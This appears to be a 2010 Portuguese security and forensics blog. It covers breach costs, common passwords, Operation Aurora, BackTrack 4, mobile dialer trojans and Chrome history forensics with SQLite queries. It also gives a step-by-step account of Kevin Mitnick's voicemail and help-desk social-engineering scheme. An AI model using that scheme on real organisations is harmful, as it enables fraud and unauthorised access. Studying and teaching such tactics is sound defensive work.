Thursday, January 28, 2010

Quanto custa para as empresas uma informação violada??

Qual o custo da violação de dados em uma empresa? Recente reportagem no site da revista Computerworld tratou deste assunto. Um texto muito bom que merece ser lido!



O custo de violações de dados atingiu 204 dólares por registro perdido ou roubado em 2009, de acordo com o estudo anual conduzido pelo Ponemon Institute, que realiza pesquisas sobre segurança da informação. O valor aumentou 2 dólares em relação a 2008, mas uma comparação com os últimos cinco anos mostra um crescimento de 138 dólares.

O custo médio causado pela violação de dados passou de 6,65 milhões de dólares, em 2008, para 6,75 milhões de dólares em 2009. As estatísticas foram baseadas em informações de 45 empresas que reconheceram publicamente a violação de dados confidenciais de clientes ao longo de 2009. Ao realizar a análise, o Ponemon Institute levou em consideração fatores como custo de negócios perdidos por causa do incidente de segurança, honorários advocatícios e despesas com treinamento e tecnologia para solucionar o problema.

Segundo o presidente e fundador do Ponemon Institute, Larry Ponemon, três fatores principais que levam à violação de dados. E esses aspectos também foram indicados pelas 45 empresas participántes do relatório anual "EU cost of data breach Study".

"Neglicência, com pessoas cometendo erros como laptops perdidos, responde por 40% dos casos de violação de dados. O segundo fator, com 36%, são falhas de sistema, como, por exemplo uma terceira parte enviando informações que não deveriam sair da empresa. A terceira forma são os ataques mal intencionados e criminosos, com 24%".

O Ponemon Institute avalia que o ano de 2009 trouxe ataques mais sofisticados, muitas vezes envolvidos com botnets e motivados por interesse financeiro.

Globalmente, 42% dos casos avaliados pelo instituto ocorreram devido a erros cometidos por uma terceira parte. Além disso, mais de 82% dos casos estudados eram de empresas que tiveram mais de uma violação de dados envolvendo a perda ou o roubo de mais de 1.000 arquivos contendo informações pessoais.

Em 40% das empresas que participaram da pesquisa, o Chief Information security Officer (CISO) era o responsável por gerenciar a resposta relacionada ao incidente. As habilidades gerenciais do CISO, ou do executivo em posição equivalente, ajudam a reduzir os custos da violação de dados. Em empresas com um CISO, este valor era de 157 dólares por arquivo, contra 236 dólares no caso das companhias sem esse executivo.


A magnitude dos eventos de segurança, de acordo com o estudo, variou entre 5.000 e 101.000 arquivos perdidos ou roubados. A solução do incidente mais caro custou 31 milhões de dólares e do mais barato totalizou 750 mil dólares.

Empresas sofrem um ataque de hackers por segundo

Reportagem do site do Terra revela que a cada segundo um fornecedor de infraestrutura em tecnologia é alvo de um ciberataque.

Hackers frequentemente têm sucesso em ataques contra empresas, afirmam especialistas em segurança, mas as companhias que são alvo dessas incursões raramente as revelam porque temem prejudicar suas reputações e incentivar os criminosos. Por conta disso, o anúncio do Google de que foi alvo de um "altamente sofisticado ataque dirigido" na China ganhou tamanho destaque este mês.

Para a pesquisa da McAfee, o Centro Estudos Estratégicos e Internacionais ouviu cerca de 600 executivos voltados a áreas de tecnologia da informação e segurança dos setores de energia, transporte, saneamento, governo, telecomunicações e financeiro em 14 países.

"Nos países mais desenvolvidos, a infraestrutura crítica está conectada à Internet e pode não ter os recursos devidos de segurança, o que deixa essas instalações vulneráveis", afirma a McAfee no relatório. Cerca de 37% das empresas acreditam que a ameaça à infraestrutura crítica esteja crescendo e 40% esperam um importante incidente de cibersegurança para o próximo ano, afirma a pesquisa. O levantamento também sustenta que uma em cada cinco empresas foi vítima de extorsão financeira.

Greg Day, analista de segurança da McAfee, disse que a maior surpresa na pesquisa foi a escala e a amplitude dos ataques. "Está acontecendo em uma escala tão grande e nós certamente veremos ataques cada vez mais sofisticados", disse Day.

Senhas fracas colocam segurança corporativa em risco

Após alerta feito pelo estudo da BBC, foi a vez da revista ComputerWorld enviar alerta sobre senhas fracas no mundo corporativo:

“A maioria das 5 mil senhas mais comuns estão nas listas usadas pelos hackers para entrar em contas com a ajuda de scripts”, relata o chefe de tecnologia da Imperva, Amichai Shulman. Em outras palavras, um hacker com essa lista em mãos poderia quebrar uma senha a cada segundo com ferramentas automáticas de adivinhação.

O relatório da Imperva não foi o primeiro a mostrar essa tendência. O que o separa dos demais, no entanto, é a amostra grande de senhas analisadas. Embora as senhas levavam a contas com valor relativamente baixo, estudos prévios mostraram que usuários têm a tendência de aplicar a mesma senha para cada serviço. E a pior notícia é que os hackers usam essas técnicas para realizar ataques nas redes corporativas, em busca de alguma vantagem financeira.

Em novembro passado, por exemplo, o centro de crimes cibernéticos do FBI percebeu tentativas de criminosos virtuais de roubar aproximadamente 100 milhões de dólares usando credenciais roubadas. Na média, um caso desses é aberto toda semana no FBI.

De acordo com o FBI, na maioria dos casos as técnicas usadas pelos criminosos são cavalos de tróia que identificam, de forma sofisticada, a digitação do usuário no teclado durante transações em contas bancárias corporativas.

Tais ataques reforçam a ideia de que as empresas precisam ter um controle muito maior do que o atual sobre os métodos de autenticação. Para administradores de rede, a única forma é obrigar que senhas fortes sejam adotadas. “Se os usuários ficarem livres para escolher, fraquezas vão surgir”, diz Shulman.

De acordo com o relatório, o controle contra as ferramentas favoritas dos hackers também são essenciais. Os tradicionais testes com digitação de palavras são uma das formas de evitar que scripts adivinhem senhas. O estudo recomenda, também, que os administradores de rede criem uma política de mudança periódica de senhas e encorajem os usuários a criarem frases complexas em vez de apenas uma palavra ou combinação de números.

Wednesday, January 27, 2010

TechBiz Forense Digital na mídia!!!

Reportagem de segunda feira (25/11) no site do jornal Estado de Minas, disponível em: http://www.uai.com.br/htmls/app/noticia173/2010/01/25/noticia_tecnologia,i=145128/ESPECIALISTAS+DISCUTEM+EM+BH+COMBATE+AO+CRIME+DIGITAL.shtml


Especialistas mundiais no combate ao crime digital se reúnem a partir desta segunda até a próxima sexta-feira, em Belo Horizonte, para apresentar ferramentas e estratégias para reagir e investigar os incidentes cibernéticos. Só em 2009, mais de 358 mil notificações foram geradas ao Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil (Cert.BR).




O encontro, promovido pela empresa brasileira TechBiz Forense Digital, também traçará as oportunidades de mercado de uma indústria que rende aos infratores cibernéticos US$ 100 bilhões ao ano no mundo todo. “O Brasil é hoje um dos maiores mercados do planeta pelo seu potencial econômico e, infelizmente, por suas vulnerabilidades nesse setor. Trata-se do país líder em envio de mensagens indesejadas pela internet”, diz Rodrigo Vilanova, gerente nacional de vendas da TechBiz Forense Digital.


A tecnologia para o contra-ataque é importada dos Estados Unidos, França e Suécia, de empresas como Guidance Software, NetWitness e Acess Data que se farão presentes no evento que acontece na Amcham.

Canal EnCase no YouTube

A Guidance disponibiliza pelo YouTube, uma série de vídeos sobre o EnCase. Vale a pena visitar e aprender mais sobre a ferramenta!

http://www.youtube.com/user/EnCaseTraining

George Hotz again....

O anúncio é no mínimo intrigante. George Hotz, o hacker de 18 anos responsável pelo desbloqueio dos iPhones de segunda geração, anunciou em seu twitter que conseguiu, depois de mais de 3 anos de tentativas, romper o esquema de proteção do PlayStation 3.



Em seu blog, Hotz explica que, apesar de ter sido um enorme avanço, ainda está longe de conseguir uma forma viável de fazer o PS3 rodar código compilado pela comunidade de programadores. Ou, como muita gente espera, para o console rodar jogos piratas, baixados e gravados dentro de um HD externo…

O mais curioso, ele agradece pessoalmente George Kharrat, do site iPhone Mod Brasil, pelo PS3 que foi utilizado no estudo do código.

Segundo Hotz, o esquema de proteção do console é baseado em uma solução composta de hardware e software, sendo a parte de software a mais complexa de ser quebrada.

O sistema de proteção lembra bastante o utilizado pelo PSP, que pode ser desbloqueado com a substituição da BIOS do console para que jogos piratas e software não-oficial sejam utilizados.

Muita gente já divulgou informes falsos sobre o desbloqueio do PS3, mas Hotz conquistou uma enorme credibilidade ao deixar toda a comunidade hacker internacional para trás ao conseguir desenvolver o exploit JailBreak para o iPhone.


Dificilmente encontraremos versões ripadas de jogos para PS3 disponíveis para download, pelo menos em sua forma pura. Os jogos, que vem originalmente gravados em Blu-ray, tem tamanhos impraticáveis para download, algo da grandeza de 20GB, em média.

O que pode acontecer é o uso de mecanismos de compressão pesada, e o estudo mais aprofundado da estrutura de arquivos dos jogos pode também revelar esquemas para que a mídia seja totalmente utilizada.

A Sony já usou de artifício semelhante com o PSP. Muito jogos, para utilizar toda a capacidade da mídia física UMD, vinham com código inútil atrelado. Há alguns anos, poucos meses depois da descoberta do desbloqueio do portátil, foi desenvolvida uma ferramenta que jogava fora o código inútil, reduzindo significativamente o tamanho (em MB) de muitos jogos.

Hotz declarou também que só revelará detalhes do desbloqueio quando tiver uma versão funcional em mãos, para evitar que a Sony desenvolva contramedidas.

No PSP, a fabricante japonesa utiliza uma estratégia de lançamento de inúmeras versões do firmware para inutilizar o firmware hackeado. Até hoje, o maior tempo que o PSP ficou bloqueado pelo firmware original da Sony foi de menos de 1 mês. Desde então, no dia seguinte do lançamento de uma versão nova de firmware pela Sony, a comunidade hacker libera o firmware modificado, com todas as funcionalidades incluídas pela Sony adicionadas da habilidade de rodar código não-oficial e jogos piratas.

É certo que, mesmo que funcione, esse desbloqeuio do PS3 não vai iniciar uma corrida para comprar mídias de Blu-ray virgens. Além do custo gigantesco (em algumas lojas no exterior, as mídias custam até US$ 30), é preciso um investimento razoável para a compra de um gravador de Blu-ray.

Muita gente vai recorrer aos HDs externos mesmo. E aí, haja banda larga para baixar os jogos. Se chegar a existir, pelo menos por um tempo, será difícil a pirataria do Ps3 ser disseminada como foi a de PS2. Quem sabe quando todos tiverem conexão de fibra ótica…

Kevin Mitnick na Campus Party 2010

Quem assistiu à palestra do americano Kevin Mitnick na Campus Party 2010 pode ter ficado na dúvida se aquele senhor de terno e cabelo bem cortado já foi mesmo um hacker. Mas a fama de Mitnick não veio à toa. Ao longo dos anos 1980 e 1990 ele realizou uma série de invasões que lhe renderam cinco anos de cadeia, incluindo alguns meses de solitária.



A primeira longa passagem de Mitnick pela prisão aconteceu em 1988, quando foi condenado por ter invadido os sistemas da empresa de software americana DEC. Após cumprir uma sentença de um ano, Mitnick foi solto.

Entretanto, ele violou os termos de sua condicional, que restringiam suas atividades com computadores. Em 1992, Mitnick passou a atuar como hacker novamente. Por isso, foi novamente condenado, mas não se entregou. Mitnick conseguiu escapar do FBI por três anos, usando nomes falsos e clonando celulares para se comunicar.

A caçada do FBI a Kevin Mitnick foi amplamente divulgada pela imprensa americana, notadamente pelo jornal The New York Times. O repórter que cobriu o caso, John Markoff, posteriormente publicou um livro com detalhes do episódio.

Em 1995, Mitnick foi finalmente preso pelo FBI. Dessa vez, ele cumpriu cinco anos de prisão, sendo libertado em janeiro de 2000. Mesmo depois de solto, Mitnick foi proibido de usar a internet por três anos.

Considerado uma ameaça à segurança dos sistemas de telefonia e computador dos Estados Unidos, Mitnick teve até que pedir permissão do governo americano para usar um computador para escrever o livro "A Arte de Enganar". Na obra, publicada em 2003, Mitnick conta um pouco da sua trajetória e fala sobre como conseguia as informações necessárias para suas atividades de hacker. Atualmente, Mitnick tem uma empresa de consultoria de segurança da informação, a Mitnick Security.

O blog do link divulgou um script da palestra de Kevin (http://blogs.estadao.com.br/link-tempo-real/2010/01/26/direto-da-palestra-de-kevin-mitnick/) na CampusParty 2010. Transcrevo o texto aqui, em ordem decrescente da seqüencia cronológica.

14: 22 – Mitnick pede para os participantes fazerem fila para pegar seu cartão de visitas. É um cartão recortado, feito em metal, com ferramentas para arrombar fechaduras. As pessoas vibram e invadem o palco. Acaba a palestra.

14:17 – Mitnick encerra falando que é necessário dizer não e prestar atenção em quem pede suas informações. Temos que ignorar nossos instintos de dar atenção e ajudar a todos e colaborar. É a melhor forma de parar o ataque de engenharia social. Até conseguir verificar a veracidade de quem quer seus dados, negue tudo.

14: 15 – Com um telefonema para os EUA, ele sequestra a linha de um dos participantes da palestra. Muitos aplausos.

14:13 – As pistas que damos, como nossas informações Ele demonstra como , com um simples número de celular, ele consegue roubar a identidade de alguém, roteando o número de telefone e se tornando a pessoa. Impressionante.

14:10 – Mitnick explica que até o lixo físico é vulnerável. Material impresso é fonte de informações.

14:08 – A pesquisa é a maior arma do hacker. Segundo Mitnick, um bom hacker varre o Google, as redes sociais, o Twitter, para conseguir levantar um perfil sólido que viabilize o ataque.

14:06 – A maioria dos problemas de segurança acontece porque as pessoas confiam umas nas outras. Os hackers exploram as fraquezas das pessoas e a boa vontade alheia para conseguir dados. E muita gente acha que esse tipo de roubo de informações só acontece com os outros. O chamado “benefício da dúvida”, a confiança inicial das pessoas, é a maior brecha na segurança.

14:05 – Mitnick é aplaudido com entusiasmo, por conta da história.

14:04 – Na conversa, ele conseguiu roubar dados confidenciais. Conseguiu inclusive acesso à rede interna da Motorola.

13:59 – Ele mostra um telefone de 1993, um Motorola Startac Ultralite. Ele queria modificar o código-fonte do sistema dele, e com algumas ligações, ele conseguiu acesso a informações confidenciais que o permitiram modificar o telefone. Ele simplesmente descobriu o caminho das pedras para conseguir a informação. Ele descreve como ensinou uma funcionária a zipar o código-fonte em um arquivo de 10 MB, colocá-lo em um FTP e mandar para ele. E o tempo todo os funcionários achavam que ele era um legítimo recém-contratado.

13:57 – Mitnick demonstra como a vulnerabilidade dos browsers dá margem a invasões. Ele comenta que foi assim que o Google foi atacado na China.

13:52 – Ele mostra um pequeno programa, instalado no pendrive, que rouba os 20 últimos arquivos acessados do PC ao ser plugado, instantaneamente. É de gelar a alma…

13:51 – Mitnick comenta que é preciso cuidado com qualquer mídia removível, como pendrives, CDs, DVDs…

13:50 – No telão, ele mostra como a invasão funciona. É assustador, mas o computador infectado começa a transmitir cada ação do usuário imediatamente pela web. E ele apenas plugou o pendrive na máquina.

13:49 – Ele mostra como é simples embutir um trojan em um arquivo de office ou PDF. Em um pendrive qualquer, e;le consegue se infiltrar no computador.

13:48 – Mitnick mostra um pequeno roteador sem fios, ligado a uma bateria, que serve para roubar identidades em aeroportos. Ele responde mais rápido que os sites visitados, como o Facebook, e rouba as dados.

13:45 – Ele diz que a fronteira final desse tipo de golpe é hackear o telefone e agir como intermediário entre o banco e o usuário.

13:41 – É o site da sua consultoria de segurança. O número que ele discou ao telefone era um desses números fantasma, mas sob o controle da sua empresa. Ele mostra como o sistema captura todos os dados e comenta que fez a mesma coisa em um evento de segurança da Visa.

13:40 – Ele explica que com a ajuda do telefone, é possível triangular um ataque perfeito. Ele demonstra em um site como o ataque pode ser feito.

13:38 – Kevin Mitnick explica como o Phishing está disseminado e como as pessoas acreditam em tudo o que chega pelo e-mail. E que os esquemas de golpe são tão avançados que existe até centrais telefônicas fantasmas, que soam exatamente como as dos bancos. É aí que a senha é capturada, quando o usuário a digita no telefone.

13:34 – Mitnik fala de como é simples, usando o tamanho das grandes empresas e a burocracia, se infiltrar. Ele conta que basta escolher uma empresa, ligar para alguns funcionários, que normalmente estão listados no site da empresa, e descobrir quem está de férias. Em seguida, basta ligar para o suporte da empresa e dizer que o correio de voz está com o acesso restrito.

Como a verificação é nula, o operador dá a senha do correio de voz e dá a ele o acesso ao correio de voz. Então, ele grava uma mensagem de saudação e liga para o suporte técnico. Depois de se identificar, ele pede para deixarem no correio de voz o código da rede. Como o ramal é correto e a voz dele está gravada, o técnico dá a ele a senha, abrindo o sistema da empresa,

13:30 – Parte dos ataques pode ser de natureza híbrida. Além de conseguir informações vitais, um hacker pode entrar no sistema com um login falso, que parece legítimo, e daí, por meio de engenharia social, ele consegue acesso ao sistema.

13:29 – Muitos golpistas contatam o suporte telefônico de bancos ou empresas para conseguir senhas. É a típica conversa mole, “jogar verde”, para conseguir uma senha com o nome do funcionário ou outros dados descobertos, como o nome da mãe ou do cachorro. E todas essas informações podem ser conseguidas com uma simples entrevista ou pesquisa falsa, feita na rua.

13:27 – Ao falar a senha para uma pessoa conhecida via telefone, ou mesmo e-mail e outros meios eletrônicos, a pessoa se expõe. Até mesmo o contato com o suporte técnico pode ser uma brecha de segurança.

13:25 – Ele fala que muita gente não desconfia e fala suas informações pessoais para qualquer pretenso pesquisador. E dessa forma, informações confidenciais, que podem levar à descoberta de mais dados para roubo de identidade.

13:20 – Mitnick explica que a engenharia social é o melhor e mais simples método de hackerismo. A engenharia social, ou seja, convencer as pessoas a entregar suas informações vitais, não é detectável, roda em qualquer plataforma e é infalível. ”Não dá para pedir para a microsoft um patch contra burrice" , fala ele.

13:15 – Ele conta uma das histórias de seu livro, lançado em 2002. É sobre um funcionário de um banco que utilizou seu trânsito livre para manipular colegas e conseguir acesso a US$ 10 milhões.

13:11 – O tema da palestra é “A Arte de Enganar”.

13:08 – Ele diz que os ataques hoje são um misto de engenharia social e conhecimento de software. Os hackers (ou crackers) enganam as pessoas para conseguir informação vital.

13:07 – Mitnick sobe ao palco sob ovação. Alguns aplaudem de pé.

13:05 – Um vídeo dramático, com música e cortes dignos de Hollywood conta a trajetória do hacker, que foi preso e hoje é expert em segurança digital.

13:00 – Começa agora a palestra do hacker e especialista em segurança Kevin Mitnick.

Friday, January 22, 2010

Google Chrome Forensics

A algum tempo atrás o Google anunciou um novo browser no mercado. Com tantas opções disponíveis, o Chrome logo se destacou pela interface absurdamente limpa, tal como o buscador de tanto sucesso da empresa.






Neste artigo vou falar um pouco sobre o Chrome e como ele armazena alguns dados, como histórico da navegação e também histórico de downloads, por exemplo.


O Google armazena o histórico do navegador Chrome em um banco de dados SQLite, não muito diferente do Firefox. No entanto, a estrutura do arquivo de banco de dados é bastante diferente.

Chrome armazena seus arquivos nos seguintes locais:

  • Linux: /home/$USER/.config/google-chrome/
  • Linux: /home/$USER/.config/chromium/
  • Windows Vista e Windows 7: C:\Users\[USERNAME]\AppData\Local\Google\Chrome
  • Windows XP: C:\Documents and Settings\[USERNAME]\Local Settings\Application Data\Google\Chrome
Existem duas versões diferentes do Google Chrome para Linux, nos pacotes oficial distribuído pela Google, que armazena os dados no diretório do Google Chrome e distribuições do Linux versão Chromium.

O arquivo de dados que contém o histórico de navegação é armazenado na pasta padrão como "History" e pode ser examinada através de qualquer navegador Sqllite existente (como sqlite3). As tabelas disponíveis são:  

  • downloads
  • presentation
  • urls
  • keyword_search_terms
  • segment_usage
  • visits
  • meta
  • segments
As tabelas mais relevantes para o histórico de navegação são: URLs (contém todas as URLs visitadas), VISITS (contém, entre outras informações, o tipo de visita e os timestamps) e finalmente os "DOWNLOADS" (contém uma lista dos arquivos baixados).

Se formos analisar a tabela de urls por exemplo, usando sqlite3 podemos ver:

sqlite.schema urls
CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,
typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,
favicon_id INTEGER DEFAULT 0 NOT NULL);
CREATE INDEX urls_favicon_id_INDEX ON urls (favicon_id);
CREATE INDEX urls_url_index ON urls (url);
  
E a tabela de visitas:
sqlite.schema visits
CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN);
CREATE INDEX visits_from_index ON visits (from_visit);
CREATE INDEX visits_time_index ON visits (visit_time);
CREATE INDEX visits_url_index ON visits (url);
Assim, podemos construir uma query SQL para obter algumas informações sobre o hábito de navegação do usuário.

SELECT urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition
FROM urls, visits
WHERE
 urls.id = visits.url
Esta query SQL retorna todos os URLs que o usuário visitou juntamente com a contagem de visitas, o tipo e a data e hora.

Se formos analisar as informações de data / hora da tabela de VISITS nós podemos ver que eles são formatados como o número de microssegundos desde a meia-noite UTC de 1 de janeiro de 1601.

Se dermos uma olhada no esquema da tabela de DOWNLOADS, veremos :
CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,
start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL);
 
E ao examinar a hora (o start_time), podemos ver que ele é armazenado no formato Epoch.

Há mais uma coisa interessante para mencionar na tabela VISITS . É a coluna "transition". Este valor descreve como a URL foi carregado no navegador.


(In)felizmente o navegador Chrome tem um modo de privacidade chamado "modo incognito". Este recurso pode ser acessado pressionando as teclas CTRL + SHIFT + N com o navegador em foco.


Em brebe irei postar como fazer este trabalho utilizando a ferramenta EnCase, da Guidance.

Ate lá!

Operação "Aurora" (IE Exploit)

O grande assunto do momento são os cyber ataques sofridos pelo Google, supostamente originados pelo governo Chines, explorando uma falha no Internet Explorer da Microsoft.

A Microsoft confirmou nesta quarta-feira, 20/01, que uma falha de segurança permitiu uma série de tentativas de roubo de informações on-line e de controle não-autorizado de computadores, em sua maioria contra empresas que utilizam a versão 6 do Internet Explorer.

No informe, a MS ressaltou que a versão 6 do Explorer foi lançada há dez anos e que não está preparada para as ameaças existentes atualmente. A empresa recomenda, em função disso, que todos os clientes migrem suas versões para a atual - o IE 8. A Microsoft ressalta ainda que está desenvolvendo uma atualização de segurança que proteja todas as versões do Internet Explorer, desde a versão 6: "Ainda que na América Latina não haja ocorrências como os incidentes reportados, como um cuidado adicional, a Microsoft recomenda aos internautas que já utilizam a versão 8 do Explorer que definam como padrão o nível máximo de segurança do navegador", completou a empresa.

O Aurora é considerado uma ameaça de alto risco para as redes corporativas. Ele foi o responsável pelos ciberataques denunciados pelo Google na China. Outras empresas foram atacadas, entre elas, a Juniper Networks. O caso provocou um conflito ainda maior entre os governos dos Estados Unidos e da China.

E para amplificar o problema, o código do ataque virou de domínio público e os governos da França e da Alemanha chegaram a sugerir que os internautas evitassem o uso do IE. Este vídeo demonstra como o explorar o "Aurora".





A variedade atual de malware é bastante sofisticada, altamente direcionada e projetada para infectar, ocultar o acesso, roubar dados ou modificar dados sem detecção. Esses ataques altamente personalizados foram originalmente presenciados pelos governos, sendo que a mera menção de seus nomes causa terror em qualquer combatente ao cibercrime.
            
Para a McAfee, a Operação Aurora está novamente alterando o cenário de ciberameaças. Esses ataques mostraram que empresas de todos os setores são alvos muito lucrativos. Muitas se mostram extremamente vulneráveis a esses ataques direcionados, oferecendo um bem extremamente valioso: a propriedade intelectual.

Maiores informações: http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/


[UPDATE] - http://sseguranca.blogspot.com/2010/01/china-vs-google-e-cia-ou-nao-ha-como.html


O link acima leva para o melhor texto jã publicado sobre a saga Google Vs. China que eu ja li. Leitura recomendada!

alvos novos para ataques velhos

Na época dos modems dial-up, os dialers ficavam à espreita em sites pornográficos. Quando eles identificavam as vítimas, desconectavam seu modem e faziam uma ligação de longa distância, deixando as vítimas com contas telefônicas altíssimas. Por conta do sistema de cobrança das ligações internacionais, os criminosos recebiam parte do dinheiro pago pela ligação. Alguns diallers chegavam a desligar a caixa de som dos modems para que a vítima não percebesse a ligação internacional.

Agora, o braço de segurança da empresa de softwares CA anunciou ter notado um aumento deste tipo de dialer nos smartphones. Desta vez, em vez de fazer ligações internacionais, eles ligam para linhas com tarifa mais alta, deixando a conta com as vítimas.

Escrevendo no blog de segurança da CA, Akhil Menon disse que “esta vendo uma crescente tendência do uso de diallers Cavalos de Troia". Menon descreveu um desses vírus, o Swapi.B, que manda mensagens de texto para linhas com tarifa mais alta.

“As mensagens são enviadas em um formato típico para linhas com tarifas mais altas e deixam o dono do celular com uma conta salgada, sem que ele tenha consentido, ou sequer soubesse.”

Muitos desses vírus, inclusive o Swapi.B, são contraídos em sites pornográficos, disfarçados de software, videoclipes ou programas de ajuda. Myko Hypponen, chefe de pesquisas da F-Secure, que produz softwares de segurança para celulares, disse que viu alguns tipos diferentes de diallers nos últimos meses.

Eles são populares, diz Hypponen, porque conseguem driblar um dos maiores problemas enfrentados por qualquer um que queira ganhar dinheiro com vírus para o sistema Windows: “Malwares de PCs não conseguem simplesmente roubar dinheiro de seu computador. Eles têm que passar por obstáculos como roubar o número do cartão de crédito ou enviar spam”, diz ele. “Mas um malware de celular pode simplesmente te roubar fazendo uma ligação ou enviando mensagens para um número de alta tarifa.”

Alguns criadores dos diallers também estão trabalhando para dificultar que seus serviços telefônicos com tarifas mais altas sejam fechados. Segundo Hypponen, muitos dos diallers ligam ou enviam mensagens para vários números diferentes, inclusive números legítimos. “Os Cavalos de Tróia podem fazer ligações para, digamos, cem números diferentes de tarifa mais alta, e apenas um deles seria o seu”, disse ele. “Como você pode combatê-los? Eliminando todos os números, inclusive os legítimos?”, conclui.


fonte: http://community.ca.com/blogs/securityadvisor/archive/2010/01/12/beware-java-dialers-that-affect-mobile-bills.aspx

password: 123456

A empresa Imperva analisou 32 milhões de senhas recentemente reveladas após um ataque de hackers ao site RockYou.com.
Na lista, entre as dez senhas mais comuns, estão cinco versões mais longas ou mais curtas da sequência de algarismos de 1 a 9.
Em primeiro lugar está a senha "123456", usada por cerca de 1% dos usuários do RockYou.com.
Outras senhas incluem nomes próprios, gírias, palavras conhecidas e senhas triviais, compostas por letras vizinhas no teclado, por exemplo.
O estudo também identificou que muitas das senhas são usadas também em outros sites, incluindo os de redes de relacionamento e de lojas virtuais.
"As pessoas precisam entender o que a combinação de senhas fracas significa no mundo de hoje, em que os cyberataques são automatizados: com um mínimo esforço, um hacker pode ganhar acesso a uma nova conta a cada segundo - ou mil contas a cada 17 minutos", explicou Amichai Shulman, um dos diretores da Imperva.
Segundo a empresa, quanto mais curta e simples a senha escolhida, mais suscetível o usuário está aos ataques.
"O problema mudou muito pouco nos últimos 20 anos", disse Shulman, referindo-se a um estudo de 1990, realizado pela Unix e que mostrava um padrão de escolha de senhas parecido com os de hoje.
Em geral, sites recomendam que as senhas contenham algarismos e letras, além de caracteres em letras maiúsculas e minúsculas.

As senhas mais comuns

  1. 123456
  2. 12345
  3. 123456789
  4. Password ("senha")
  5. iloveyou ("eu te amo")
  6. princess ("princesa")
  7. rockyou
  8. 1234567
  9. 12345678
  10. abc123


fonte: http://www.bbc.co.uk/portuguese/ciencia/2010/01/100121_internetsenhasml.shtml

Thursday, January 21, 2010

Back track 4 Versão Final



Este é, atualmente, uma das melhores distribuições de Linux com foco em testes de penetração. Sem nenhuma instalação, BackTrack é uma distribuição Linux live que também pode ser instalada.

Back Track é a união de duas antigas distribuições Linux: Whax e Auditor Security Collection, reunindo mais de 300 ferramentas para análise e testes de vulnerabilidades Esta nova edição BackTrack 4, segundo o site oficial já alcançou mais de 100.000 downloads.

Segundo o anúncio, o BackTrack 4 traz grandes avanços conceituais e tem algumas novas e excelentes características. A mais importante destas mudanças é a expansão do Pentesting LiveCD para uma plena “Distribuição”.

Agora, baseado em Debian (núcleo e pacotes) e utilizando os repositórios de softwares do Ubuntu, o BackTrack 4 pode ser adaptado em caso de atualização. Quando sincronizado com os repositórios oficiais do BackTrack, o sistema irá receber regularmente actualizações de segurança e novas ferramentas.

Algumas das novas características incluem:

* Kernel 2.6.30 com melhor suporte de hardware.
* Suporte nativo para cartões Pico E12 e E16 está agora totalmente funcional, fazendo do BackTrack a primeira distro Pentesting em utilizar plenamente os recursos destas minúsculas máquinas.
* Suporte para Boot PXE.
* SAINT EXPLOIT – gentilmente fornecido pela corporação SAINT com um número limitado de IPs livre.
* Maltego 2.0.2
* Os últimos pactches mac80211 wireless injection pacthes foram aplicados, juntamente com vários patches personalizados para o rtl8187 injection. O suporte à wireless injection nunca foi tão amplo e funcional.
* Unicornscan – Totalmente funcional com suporte ao postgress logging e web front end.
* Suporte RFID
* Suporte Pyrit CUDA
* Novas ferramentas e atualizações

A lista de software contido nesta distribuição, tem aplicações com tudo de bom e do melhor, Wireless, Passwords, Spoofing, Tunneling, Enumeration, Bruteforce, Sniffers, VOIP, Bluetooth, Fuzzers, Forensics, Cisco, Debuggers, Database, RFID, Penetration, GPU, etc…

Download: http://www.backtrack-linux.org/downloads/
Site oficial: http://www.backtrack-linux.org/

Friday, January 15, 2010

Google muda Gmail para protocolo HTTPS, mais seguro

Com o risco de causar inconvenientes a alguns usuários, o Google mudou o Gmail para um protocolo mais seguro. O momento da ação parece uma resposta às tentativas de hackear o serviço de e-mails que surgiram na China.

O Google oferecia anteriormente o acesso HTTPS como uma opção, mas na terça-feira (12/1) disse que se tornaria padrão e passaria isso para os usuários ao longo das próximas semanas.

O HTTPS, que criptografa o tráfico na web, é uma fonte intensiva e mais cara para o Google oferecer. A mudança foi anunciada no blog oficial da companhia sem mencionar as tentativas de invasão da China.

“Usar HTTPS ajuda proteger os dados de serem usados por terceiros, como em hotspots Wi-Fi gratuitos”, disse o diretor de engenharia do Gmail, Sam Schillace.

“Inicialmente deixamos a opção de escolher o tipo de conexão porque há alguns problemas: HTTPS pode deixar seu e-mail mais lento já que dados criptografados não viajam pela web com a mesma velocidade que os normais. Ao longo dos últimos meses estudamos opções e decidimos colocar o HTTPS para todo mundo.”

Para a maioria dos usuários a mudança passou despercebida. Porém, quem usa o Gmail enquanto está offline pode enfrentar alguns problemas.

“Se você tentar usar o Gmail offline por HTTP, a mudança para o HTTPS pode trazer alguns problemas”, disse a empresa, que ofereceu uma página oferecendo informações para uso da ferramenta (em inglês).

Maiores informações em: http://mail.google.com/mail/help/intl/pt-BR/about_whatsnew.html#utm_source=pt-BR-et-newfea&utm_medium=et&utm_campaign=pt-BR

VeriSign's afirma que China está por trás do ataque ao Google

Pesquisadores do laboratório VeriSign's iDefense publicaram um relatório nesta sexta-feira, identificando os servidores de onde partiram os ataques ao Google na China – em dezembro, contas do Gmail de dissidentes políticos naquele país foram invadidas, mas a empresa não quis apontar culpados. Agora, o laudo técnico do iDefense aponta efetivamente uma participação do governo chinês no caso. As informações são do site Ars Technica.

“O número do IP e o servidor de onde partiram o ataque são da mesma entidades, e ambos pertencem ao governo chinês”, afirmam os pesquisadores no relatório.

Os membros do VeriSign's iDefense também dizem que os servidores de onde partiram o ataque de dezembro são os mesmos do cyber-assalto contra diversas grandes empresas dos Estados Unidos em julho. Em ambos os casos, os hackers usaram códigos em arquivos de PDF para aproveitar uma falha do software Adobe.

